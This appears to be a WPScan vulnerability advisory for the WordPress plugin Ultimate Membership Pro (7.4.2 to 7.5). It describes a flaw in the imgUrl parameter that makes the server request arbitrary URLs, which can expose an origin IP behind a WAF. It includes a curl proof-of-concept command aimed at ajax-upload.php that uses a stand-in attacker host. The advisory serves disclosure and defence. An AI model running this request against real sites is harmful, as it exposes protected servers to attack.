indeed-membership-pro (Ultimate Membership Pro) 7.4.2<=7.5 arbitrary media include



Description
In addition to cropping/rotating/resizing an image of your choosing, you can abuse the imgUrl feature on versions that it's available on (7.4.2+ at least) to make an HTTP request to any site you want. For example, by having it connect to a site you control, you can determine the IP address of the origin even when the site is behind a third party WAF such as Fastly, Cloudflare, Sucuri, etc:
Proof of Concept
curl -d "imgUrl=https://some-evil-host.evil/pwned.png" -d 'imgInitW=1' -d 'imgInitH=1' -d 'imgW=1' -d 'imgH=1' -d 'imgY1=1' -d 'imgX1=1' -d 'cropW=1' -d 'cropH=1' -d 'rotation=0' https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php

Affects Plugin

fixed in version 7.6

References

URL https://codecanyon.net/comments/21539595

Classification

Type UNKNOWN

Miscellaneous

Original Researcher James Fraser
Submitter fwaggle
Submitter Twitter fwaggle
Views 1294
Verified No
WPVDB ID 9294

Timeline

Publicly Published 2019-02-26 (4 months ago)
Added 2019-05-27 (23 days ago)
Last Updated 2019-05-27 (23 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.